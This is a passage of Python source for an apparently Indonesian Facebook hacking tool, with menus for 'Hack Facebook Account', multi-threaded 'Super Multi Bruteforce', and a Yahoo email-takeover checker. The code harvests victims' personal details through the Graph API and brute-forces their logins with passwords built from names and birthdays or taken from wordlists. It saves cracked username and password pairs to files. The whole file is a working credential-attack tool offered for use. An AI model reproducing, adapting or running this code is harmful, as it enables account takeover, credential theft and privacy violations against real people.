print('\n\x1b[1;91m[!] No connection')
keluar()
if 'checkpoint' in url:
print(
'\n\x1b[1;91m[!] \x1b[1;93mAccounts are subject to Checkpoint')
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print('\n\x1b[1;91m[!] Login Failed')
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print('\x1b[1;91m[!] Token not found')
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
otw = requests.get(
'https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print('\x1b[1;91m[!] \x1b[1;93mLooks like the account hit Checkpoint')
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print('\x1b[1;91m[!] No connection')
keluar()
os.system('clear')
print(logo)
print('\x1b[1;97m\xe2\x95\x94' + 40 * '\xe2\x95\x90')
print(
'\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + Name)
print('\x1b[1;97m\xe2\x95\x9a' + 40 * '\xe2\x95\x90')
print('\x1b[1;37;40m1. User Information')
print('\x1b[1;37;40m2. Hack Facebook Account')
print('\x1b[1;37;40m3. Bot ')
print('\x1b[1;37;40m4. Others.... ')
print('\x1b[1;37;40m5. LogOut ')
print('\x1b[1;31;40m0. Exit ')
print
select()
def select():
zedd = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if zedd == '':
print('\x1b[1;91m[!] Jangan kosong')
select()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('rm -rf login.txt')
os.system(
'xdg-open https://www.youtube.com/channel/UC0bX56PZ_nMZw3t4p90SYyQ')
Exit()
else:
if zedd == '0':
Exit()
else:
print(
'\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mThere is no')
select()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print('\x1b[1;91m[!] Token not found')
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print(logo)
print(40 * '\x1b[1;97m\xe2\x95\x90')
id = raw_input(
'\x1b[1;91m[+] \x1b[1;92mMasukan ID\x1b[1;97m/\x1b[1;92mNama\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
r = requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' +
p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print(40 * '\x1b[1;97m\xe2\x95\x90')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + z['name'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mName\x1b[1;97m : \x1b[1;91mThere is nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mThere is Nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mThere is Nothing')
else:
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mMobile phone number\x1b[1;97m : ' + z['mobile_phone'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mMobile phone number\x1b[1;97m : \x1b[1;91mThere is Nothing')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLocation\x1b[1;97m : ' + z['location']['name'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mLocation\x1b[1;97m : \x1b[1;91mThere is nothing')
try:
print(
'\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mDate of birth\x1b[1;97m : ' + z['birthday'])
except KeyError:
print(
'\x1b[1;91m[?] \x1b[1;92mDate of birth\x1b[1;97m : \x1b[1;91mThere is nothing')
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSchool\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mThere is nothing'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print('\x1b[1;91m[\xe2\x9c\x96] User not found')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Mini Hack Facebook(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m2. Multi Bruteforce Facebook'
print '\x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '\x1b[1;37;40m4. BruteForce(\x1b[1;92mTarget\x1b[1;97m)'
print '\x1b[1;37;40m5. Yahoo Checker'
print '\x1b[1;37;40m6. Get id/email/hp'
print '\x1b[1;31;40m0. Back'
print
hack_select()
def hack_select():
hack=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Do not empty'
hack_select()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mThere is nothing'
hack_select()
def mini():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] select'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] The target account must be friends with your account first !'
try:
id=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
r=requests.get('https://graph.facebook.com/' +
id + '?access_token=' + toket)
a=json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mCheck \x1b[1;97m...')
time.sleep(2)
jalan('\x1b[1;91m[+] \x1b[1;92mUnlock security \x1b[1;97m...')
time.sleep(2)
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease Wait a minute \x1b[1;97m...')
print 40 * '\x1b[1;97m\xe2\x95\x90'
pz1=a['first_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFound.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2=a['first_name'] + '12345'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3=a['last_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir=a['birthday']
pz4=lahir.replace('/', '')
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y=json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Maaf, gagal membuka password target :('
print '\x1b[1;91m[!] Cobalah dengan cara lain.'
raw_input(
'\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idlist=raw_input(
'\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw=raw_input(
'\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file=open(idlist, 'r')
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
for x in range(40):
zedd=threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka=open(idlist, 'r')
up=buka.read().split()
while file:
username=file.readline().strip()
url='https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
username + '&locale=en_US&password=' + passw +
'&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data=urllib.urlopen(url)
mpsh=json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa=open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append(
'\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek=open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append(
'\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(
len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Koneksi terganggu'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] There is nothing koneksi'
def hasil():
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Gagal \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Crack dari daftar Teman'
print '\x1b[1;37;40m2. Crack dari member Grup'
print '\x1b[1;31;40m0. Back'
print
select_super()
def select_super():
peak=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Jangan kosong'
select_super()
else:
if peak == '1':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id teman \x1b[1;97m...')
r=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
z=json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
idg=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID Grup \x1b[1;91m:\x1b[1;97m ')
try:
r=requests.get(
'https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw=json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Grup tidak ditemukan'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re=requests.get('https://graph.facebook.com/' + idg +
'/members?fields=name,id&limit=999999999&access_token=' + toket)
s=json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mThere is nothing'
select_super()
print '\x1b[1;91m[+] \x1b[1;92mJumlah ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
titik=['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 40 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user=arg
try:
a=requests.get('https://graph.facebook.com/' +
user + '/?access_token=' + toket)
b=json.loads(a.text)
pass1=b['first_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2=b['first_name'] + '12345'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3=b['last_name'] + '123'
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir=b['birthday']
pass4=lahir.replace('/', '')
data=urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q=json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
except:
pass
p=ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
try:
email=raw_input(
'\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw=raw_input(
'\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total=open(passw, 'r')
total=total.readlines()
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan(
'\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
sandi=open(passw, 'r')
for pw in sandi:
try:
pw=pw.replace('\n', '')
sys.stdout.write(
'\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw)
sys.stdout.flush()
data=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' +
email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh=json.loads(data.text)
if 'access_token' in mpsh:
dapat=open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks=open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.'
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Koneksi Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File tidak ditemukan...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why=raw_input(
'\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Tolong select \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Tolong select \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;37;40m1. Dari teman facebook'
print '\x1b[1;37;40m2. Gunakan File'
print '\x1b[1;31;40m0. Back'
print
yahoo_select()
def yahoo_select():
go=raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Jangan kosong'
yahoo_select()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mThere is nothing'
yahoo_select()
def yahoofriends():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
mpsh=[]
jml=0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
teman=requests.get(
'https://graph.facebook.com/me/friends?access_token=' + toket)
kimak=json.loads(teman.text)
save=open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id=w['id']
nama=w['name']
links=requests.get('https://graph.facebook.com/' +
id + '?access_token=' + toket)
z=json.loads(links.text)
try:
mail=z['email']
yahoo=re.compile('@.*')
otw=yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open(
'https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html=True
br.select_form(nr=0)
br['username']=mail
klik=br.submit().read()
jok=re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek=jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 40 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 40 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket=open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 40 * '\x1b[1;97m\xe2\x95\x90'
files=raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total=open(files, 'r')
mail=total.readlines()
except IOError:
print '\x1b[1;91m[!] File There is nothing'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh=[]
jml=0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mWait a minute \x1b[1;97m...')
save=open('MailVuln.txt', 'w')
print 40 * '\x1b[1;97m\xe2\x95\x90'
